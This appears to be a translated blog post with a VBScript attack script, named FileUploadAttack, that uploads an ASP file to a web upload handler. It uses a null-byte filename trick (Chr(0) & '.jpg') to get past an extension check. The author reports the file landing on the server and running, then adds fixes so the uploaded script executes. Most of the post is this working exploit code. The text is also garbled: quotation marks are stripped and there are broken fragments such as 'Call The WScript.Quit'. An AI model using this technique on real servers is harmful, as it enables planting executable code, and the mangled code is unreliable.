Some of the scripts in this article are offensive and are for study and research only. Please use them within the legal and reasonable scope. I am not responsible for the losses caused, and I do not provide technical guidance on hacking attacks.
Demon mentioned this issue today, and it happened to remind me of an article I saw before "Automatic file upload using IE+ADO without user interaction - VBSscript". This article gives an example of a local non-interactive automatic upload script. You can borrow it for today. The original script uses the InternetExplorer.Application component. I rewrote it and used WinHttp.WinHttpRequest.5.1 to achieve a similar function. About For more usage of this component, please refer to "WinHttpRequest Object Reference".
Copy the code as follows:Option Explicit
Function file_get_contents(filename)
Dim fso, f
Set fso = WSH.CreateObject(Scripting.FilesystemObject)
Set f = fso.OpenTextFile(filename, 1)
file_get_contents = f.ReadAll
f.Close
Set f = Nothing
Set fso = Nothing
End Function
' Code modified from http://www.motobit.com/tips/detpg_uploadvbsie/
Class FileUploadAttack
Private m_objWinHttp
Private m_strUrl
Private m_strFieldName
Private Sub Class_Initialize()
Set m_objWinHttp = WSH.CreateObject( _
WinHttp.WinHttpRequest.5.1)
End Sub
Private Sub Class_Terminate( )
Set m_objWinHttp = Nothing
End Sub
Public Sub setUrl(url)
m_strUrl = url
End Sub
Public Sub setFieldName(name)
m_strFieldName = name
End Sub
'Infrormations In form field header.
Function mpFields(FieldName, FileName, ContentType)
Dim MPTemplate 'template For multipart header
MPTemplate = Content-Disposition: form-data; name={field}; + _
filename={file} + vbCrLf + _
Content-Type: {ct} + vbCrLf + vbCrLf
Dim Out
Out = Replace(MPTemplate, {field}, FieldName)
Out = Replace(Out, {file}, FileName)
mpFields = Replace( Out, {ct}, ContentType)
End Function
'Converts OLE string To multibyte string
Function StringToMB(S)
Dim I, B
For I = 1 To Len(S)
B = B & ChrB(Asc(Mid(S, I, 1)))
Next
StringToMB = B
End Function
'Build multipart/form-data document with file contents And header info
Function BuildFormData(FileContents, Boundary, _
FileName, FieldName)
Dim FormData, Pre, Po
Const ContentType = application/upload
'The two parts around file contents In the multipart-form data.
Pre = -- + Boundary + vbCrLf + mpFields(FieldName, _
FileName, ContentType)
Po = vbCrLf + -- + Boundary + -- + vbCrLf
'Build form data using recordset binary field
Const adLongVarBinary = 205
Dim RS: Set RS = WSH.CreateObject(ADODB.Recordset)
RS.Fields.Append b, adLongVarBinary, _
Len(Pre) + LenB(FileContents) + Len(Po)
RS.Open
RS.AddNew
Dim LenData
'Convert Pre string value To a binary data
LenData = Len(Pre)
RS(b).AppendChunk (StringToMB(Pre) & ChrB (0))
Pre = RS(b).GetChunk(LenData)
RS(b) =
'Convert Po string value To a binary data
LenData = Len(Po)
RS(b).AppendChunk (StringToMB(Po) & ChrB(0))
Po = RS(b).GetChunk(LenData)
RS(b) =
'Join Pre + FileContents + Po binary data
RS(b).AppendChunk (Pre )
RS(b).AppendChunk (FileContents)
RS(b).AppendChunk (Po)
RS.Update
FormData = RS(b)
RS.Close
BuildFormData = FormData
End Function
Public Function sendFile(fileName)
Const Boundary = ---------------------------0123456789012
m_objWinHttp .Open POST, m_strUrl, False
m_objWinHttp.setRequestHeader Content-Type, _
multipart/form-data; boundary= + Boundary
Dim FileContents, FormData
'Get source file As a binary data.
FileContents = file_get_contents(FileName)
'The following constructs the malicious file extension Chr(0) & .jpg
'Build multipart/form-data document
FormData = BuildFormData(FileContents, Boundary, _
FileName & Chr(0 ) & .jpg, m_strFieldName)
m_objWinHttp.send FormData
sendFile = m_objWinHttp.Status
End Function
Public Function getText()
getText = m_objWinHttp.ResponseText
End Function
End Class
Function VBMain()
VBMain = 0
Dim fileUpload
Set fileUpload = New FileUploadAttack
'Need to modify the following content to the appropriate content
' Upload url
fileUpload.setUrl http:/ /localhost/upload/uploadfile.asp
fileUpload.setFieldName filepath 'The name of the upload form box
' The path of the file to be uploadedIf
fileUpload.sendFile(E:/projects/asp/index.asp)=200 Then
MsgBox uploaded successfully& fileUpload.getText()
Else
MsgBox failedEnd
If
Set fileUpload = Nothing
End Function
Call The WScript.Quit(VBMain())
upload function is a simple upload of ASP files found on the Internet, and then added to the GetFileExtensionName I described in the article "The origin of CHR(0) in ASP/VBScript and the security issues it brings" Determine whether the extension is jpg.
The test results are: manually uploading asp, failed; using the above attack script to upload asp files, successful! There is indeed an asp file in the upload directory. This asp file can also be accessed through the browser URL, but the strange thing is that the display is blank. I am IIS 7 here. Is it an IIS version problem? Maybe file_get_contents should return the binary stream of the file? Okay, let’s leave this question here for now. There are other things to do, so let’s get out of the way first.
All experimental code packages can be downloaded here upload.zip (for code bugs, please refer to the update instructions below).
Updated on December 25, 2011.
Based on everyone’s feedback, the uploaded file has become Unicode Little. Endian coding problem, first of all, I'm sorry because I was really lazy at the time. The main code reference is from a foreigner, and the foreigner explained the GetFile function to obtain file binary data. I couldn't find the implementation of this function, and I was too lazy to do binary reading, so I just did it. File_get_contents obtains text data. It turns out that there is indeed a problem with this. Let me explain the remedial measures below. It is better to be lazy and directly convert the text data into binary data on the existing basis. Using the ADODB.Stream component, the function is as follows:
Copy the code The code is as follows:
'Convert the string str of the specified charset to binary
Function strtobin(str, charset)
With WSH.CreateObject(ADODB.Stream)
.Type = 2
.Mode = 3
. Open
.Charset = charset
.WriteText str
.Flush
.Position = 0
.Type = 1
strtobin = .Read()
.Close
End With
End Function
Then change line 106 of the above code to the following (read text in ASCII):
Copy the code as follows:
FileContents = strtobin(file_get_contents(FileName), ASCII)
The ASP file uploaded after this change is Ordinarily encoded file, and then the browser accesses this file, you can see that the ASP is successfully parsed.
However, this seems a bit verbose. In fact, you can directly open the file in binary and return the data. There are two steps here: 1. Read the file in text mode; 2. Convert the text into binary data. The one-step code can refer to the following function that reads file data in binary Byte() mode:
Copy the code as follows:
'Returns file contents As a binary data
Function GetFile(FileName)
Dim Stream: Set Stream = CreateObject(ADODB.Stream )
Stream.Type = 1 'Binary
Stream.Open
Stream.LoadFromFile FileName
GetFile = Stream.Read
Stream.Close
Set Stream = Nothing
End
I won't write the more optimized code ofFunction
. It mainly explains an upload idea. If you want to get a complete upload implementation, you can refer to Demon's "VBS Simulation POST Upload File".